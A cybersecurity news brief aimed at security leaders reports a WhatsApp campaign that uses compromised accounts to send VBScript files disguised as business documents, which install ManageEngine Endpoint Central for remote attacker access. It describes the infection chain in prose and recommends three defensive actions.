What happened
An ongoing malware campaign is targeting WhatsApp users in multiple countries with deceptive messages that deliver malicious VBScript files disguised as business and financial documents.
The campaign uses compromised WhatsApp accounts to send malicious files to people in the victim’s contact list. The files are named to appear like financial reports, billing statements, account notices, and other business-related documents. The filenames are localized in multiple languages, reflecting the campaign’s global reach.
Kaspersky telemetry shows the campaign spreading across Brazil, India, Mexico, Singapore, the United Kingdom, Spain, Taiwan, Australia, Russia, Vietnam, and Malaysia.
The attack starts when a recipient downloads and opens the malicious VBScript file on Windows. The script then fetches additional scripts from attacker-controlled infrastructure. Those scripts disable User Account Control protections through registry changes and download a ZIP archive containing ManageEngine Endpoint Central.
ManageEngine Endpoint Central is a legitimate IT administration tool used to manage systems from a centralized dashboard. In this campaign, the software is silently installed in the background and configured to connect to attacker-controlled management servers, giving the attackers remote administration access to the victim’s computer.
Kaspersky said the exact method used to compromise the WhatsApp accounts remains unknown. The company also found signs of Chinese language use and infrastructure overlap with IPs previously associated with ValleyRAT and Gh0st RAT activity, but there is not enough evidence for high-confidence attribution.
Who is affected
WhatsApp users in multiple countries are affected, especially users who receive unexpected file attachments from known contacts.
Windows users are particularly exposed because the infection chain relies on opening a malicious VBScript file that executes through Windows Script Host. Users accessing the file through WhatsApp Desktop may face greater risk because the file can be executed directly, while WhatsApp Web requires the file to be downloaded first.
Organizations may also be affected if employees receive and open malicious business-themed files on work devices, allowing attackers to install remote management software and gain access to corporate systems.
Why CISOs should care
This campaign shows how trusted messaging platforms can become malware delivery channels when attackers compromise user accounts. The malicious messages come from known contacts, which can lower suspicion and make phishing awareness more difficult.
The use of legitimate remote administration software is also important. ManageEngine Endpoint Central is not inherently malicious, but in this campaign it is silently installed and configured to give attackers remote access. That makes detection harder because security tools may treat the software as legitimate unless context and configuration are monitored.
For CISOs, the attack reinforces the need to extend phishing defenses beyond email. Employees increasingly receive business documents through messaging platforms, and attackers are adapting by using WhatsApp contacts, localized filenames, and familiar document themes to drive execution.
3 practical actions
- Warn users to verify unexpected files sent through messaging apps: The campaign spreads through compromised WhatsApp accounts and uses fake business or financial document names. Employees should verify unexpected files through a separate channel before downloading or opening them, even if they come from trusted contacts.
- Restrict risky script execution on Windows endpoints: The infection chain begins when users open a malicious VBScript file. Security teams should restrict unnecessary script execution, monitor Windows Script Host activity, and alert on scripts that download additional payloads or modify User Account Control settings.
- Monitor legitimate remote management tools for abuse: The attackers silently install ManageEngine Endpoint Central and connect it to attacker-controlled servers. CISOs should maintain an approved inventory of remote administration tools, alert on unauthorized installations, and investigate systems connecting to unfamiliar management infrastructure.
John Kevin Hao is a news and feature writer covering cybersecurity, technology, and business targeted for professional audiences.